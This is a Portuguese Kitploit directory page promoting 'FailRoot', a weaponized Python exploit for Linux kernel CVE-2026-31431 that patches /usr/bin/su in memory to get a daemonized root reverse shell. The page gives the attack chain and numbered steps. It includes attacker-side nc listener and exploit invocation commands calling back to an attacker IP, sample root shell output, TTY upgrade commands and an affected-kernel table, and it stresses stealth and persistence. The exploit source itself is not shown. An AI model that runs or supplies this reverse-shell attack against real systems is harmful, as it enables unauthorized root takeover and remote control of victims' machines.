Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-31431-REVSHELL — Weaponized exploit em Python para CVE-2026-31431, encadeando escalonamento de privilégios no kernel Linux para um reverse shell root daemonizado com PTY completo, corrigindo /usr/bin/su em memória. | Kitploit
Ferramentas/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
danimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

Weaponized exploit em Python para CVE-2026-31431, encadeando escalonamento de privilégios no kernel Linux para um reverse shell root daemonizado com PTY completo, corrigindo /usr/bin/su em memória.

Ver Repositório
há 3 mesesAinda não revisado


root@kitploit:~
  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

Visão Geral

FailRoot é um exploit armado para CVE-2026-31431 — uma escrita fora dos limites no subsistema crypto: algif_aead do kernel Linux.

Ele encadeia uma escalada de privilégios com um reverse shell root daemonizado com PTY completo:

root@kitploit:~
AF_ALG + splice()  →  escrita de 4 bytes no page-cache  →  patch em /usr/bin/su  →  root

O exploit inteiro cabe em um único arquivo. Sem compilação. Sem dependências externas. Sem rastro no disco — o binário su é corrigido apenas em memória.


O que ele faz

  1. Daemoniza instantaneamente — double-fork, desanexa do terminal, retorna o prompt imediatamente
  2. Carrega módulos do kernel — algif_aead + authencesn via múltiplas estratégias de fallback
  3. Explora o CVE-2026-31431 — escreve 4 bytes controlados no page-cache de /usr/bin/su
  4. Gera reverse shell root com PTY — pty.spawn("/usr/bin/su") → TTY root totalmente interativo

O reverse shell sobrevive ao fechamento do terminal (SIGHUP ignorado), não exibe nenhuma saída no alvo e conecta com novas tentativas por até 3 minutos.


Uso

root@kitploit:~
# Atacante — iniciar listener:
nc -lvnp 4444

# Alvo — executar exploit (nada será exibido, ele daemoniza instantaneamente):
python3 exploit.py <IP_DO_ATACANTE> 4444
root@kitploit:~
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

Upgrade de TTY (lado do atacante, dentro do shell)

root@kitploit:~
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

Kernels Afetados


Requisitos

  • Python >= 3.10 (os.splice())
  • Acesso de leitura a /usr/bin/su (legível por todos em todas as distros)
  • Módulos do kernel algif_aead e authencesn disponíveis
  • Nenhum sudo necessário

Autor

danimrtzp


Aviso Legal

Apenas para pesquisa de segurança autorizada e fins educacionais. O uso indevido é ilegal.

Baixar ferramenta
DeAté (exclusivo)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6